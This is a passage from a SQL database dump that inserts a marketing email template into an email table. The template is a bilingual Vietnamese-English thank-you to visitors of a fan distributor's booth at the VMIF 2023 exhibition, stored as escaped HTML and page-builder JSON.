style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Too many emails?\\u00a0<a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"> <span style=\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\">Unsubscribe<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(13, 'Tổ chức đào tạo WIT - THANK YOU TO CUSTOMER VISIT VMIF 2023 EXHIBITION IN BINH DUONG', '', 9, 0, 1, 'vietnamese', '', 1, '2023-07-01 10:22:46', '', 'Tổ chức đào tạo WIT - THANK YOU TO CUSTOMER VISIT VMIF 2023 EXHIBITION IN BINH DUONG', 18, '', '', '', '', '', '\"{\\\"counters\\\":{\\\"u_row\\\":15,\\\"u_column\\\":20,\\\"u_content_text\\\":18,\\\"u_content_image\\\":12,\\\"u_content_video\\\":2,\\\"u_content_button\\\":8,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":5},\\\"body\\\":{\\\"id\\\":\\\"ZKEsIo9cyJ\\\",\\\"rows\\\":[{\\\"id\\\":\\\"8v6X8_eWie\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"49F_V6CJYl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Zre8H6uUHc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181449479-logo.png\\\",\\\"width\\\":2099,\\\"height\\\":1040,\\\"maxWidth\\\":\\\"94%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"90%\\\",\\\"autoWidth\\\":false}}}}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"#000000\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RKHaA3kNjd\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sYJ1ipCk6A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wb89yjmG82\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"80px 10px 15px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px;\\\\\\\"><strong>VIMF 2023<\\/strong><\\/span><\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\">Tri\\u1ec3n L\\u00e3m Qu\\u1ed1c T\\u1ebf Chuy\\u00ean Ngh\\u00e0nh V\\u1ec1 M\\u00e1y M\\u00f3c Thi\\u1ebft B\\u1ecb, Dung C\\u1ee5 V\\u1eadt Li\\u1ec7u, C\\u00f4ng Ngh\\u1ec7 K\\u1ef9 Thu\\u1eadt \\u1ee8ng D\\u1ee5ng Cho Ngh\\u00e0nh C\\u00f4ng Nghi\\u1ec7p S\\u1ea3n Xu\\u1ea5t.<\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u25b9\\u25b9\\u25b9<\\/span>Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t <span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u25b9\\u25b9\\u25b9 -\\u00a0<\\/span><\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\">MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"HAK8YEjON2\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 30px 80px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#c97a14\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":96,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#040505\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":430,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gP8etI3XjW\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"IifB1_wM-O\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GiDRLzAilF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"unikoM7yiA\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"h6wnCojqjn\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Ma_hPqaB5Q\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>HAMILTON AIR<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"wBYl8QPG9L\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderRightColor\\\":\\\"#a5a5a5\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"55FclmztDX\\\",\\\"contents\\\":[{\\\"id\\\":\\\"88IAIus72W\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a5a5a5\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u2705<\\/span> MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/p>\\\\n<p class=\\\\\\\"p2\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">L\\u00e0m cho kh\\u00f4ng gian c\\u1ee7a b\\u1ea1n hi\\u1ec7u qu\\u1ea3 h\\u01a1n v\\u1edbi d\\u00f2ng s\\u1ea3n ph\\u1ea9m lu\\u1ed3ng kh\\u00f4ng kh\\u00ed hi\\u1ec7u qu\\u1ea3 cao.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bXYUs1ZZby\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eo9KgENRVd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PcA6i4TwOU\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"nut38M1rZt\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f <span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\">First of all, Tổ chức đào tạo WIT Company would like to thank\\u00a0you for visiting our booth number 126 at VMIF Exhibition and Trademark in Binh Duong in 2023.<\\/span><\\/p>\\\\n<div style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff;\\\\\\\">Tổ chức đào tạo WIT Company is the exclusive distributor for 2 brands Big Ass Fan and Sunon in the Vietnam market. We specialize in providing industrial fans for Factories, Apartments, Villas and Resorts.<\\/div>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\">\\u2622\\ufe0f Whether you have an industrial complex or a small shop, our airflow experts are here to make your life easier, more comfortable, and less expensive.<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u2622\\ufe0f\\u00a0 Bring comfort and better experience for your home or business.<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">-------o0o-------<\\/p>\\\\n<p style=\\\\\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\">\\u00a0<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span>\\u00a0 L\\u1eddi \\u0111\\u1ea7u ti\\u00ean, C\\u00f4ng ty C\\u1ed5 Ph\\u1ea7n Tổ chức đào tạo WIT xin c\\u1ea3m \\u01a1n qu\\u00fd kh\\u00e1ch \\u0111\\u00e3 gh\\u00e9 th\\u0103m gian h\\u00e0ng s\\u1ed1 126 c\\u1ee7a ch\\u00fang t\\u00f4i t\\u1ea1i Tri\\u1ec3n l\\u00e3m v\\u00e0 Th\\u01b0\\u01a1ng hi\\u1ec7u VMIF t\\u1ea1i B\\u00ecnh D\\u01b0\\u01a1ng n\\u0103m 2023.<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span>\\u00a0 C\\u00f4ng ty Tổ chức đào tạo WIT l\\u00e0 nh\\u00e0 ph\\u00e2n ph\\u1ed1i u\\u1ef7 quy\\u1ec1n cho 2 th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t l\\u00e0m m\\u00e1t <strong>Big Ass Fan<\\/strong> v\\u00e0 <strong>Sunon<\\/strong> t\\u1ea1i th\\u1ecb tr\\u01b0\\u1eddng Vi\\u1ec7t Nam. Ch\\u00fang t\\u00f4i chuy\\u00ean cung c\\u1ea5p c\\u00e1c lo\\u1ea1i qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p cho Nh\\u00e0 m\\u00e1y, Chung c\\u01b0, Bi\\u1ec7t th\\u1ef1, Resort...<\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\" class=\\\\\\\"s1\\\\\\\">\\u2705<\\/span> Cho d\\u00f9 b\\u1ea1n c\\u00f3 m\\u1ed9t khu li\\u00ean h\\u1ee3p c\\u00f4ng nghi\\u1ec7p hay m\\u1ed9t c\\u1eeda h\\u00e0ng nh\\u1ecf, c\\u00e1c chuy\\u00ean gia v\\u1ec1 lu\\u1ed3ng kh\\u00f4ng kh\\u00ed c\\u1ee7a ch\\u00fang t\\u00f4i lu\\u00f4n s\\u1eb5n s\\u00e0ng gi\\u00fap cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n d\\u1ec5 d\\u00e0ng h\\u01a1n, tho\\u1ea3i m\\u00e1i h\\u01a1n v\\u00e0 \\u00edt t\\u1ed1n k\\u00e9m h\\u01a1n.<\\/span><\\/p>\\\\n<p style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\\\\\"><span style=\\\\\\\"line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u2705<\\/span> <\\/span>Mang l\\u1ea1i s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u00e0 tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho ng\\u00f4i nh\\u00e0 ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a 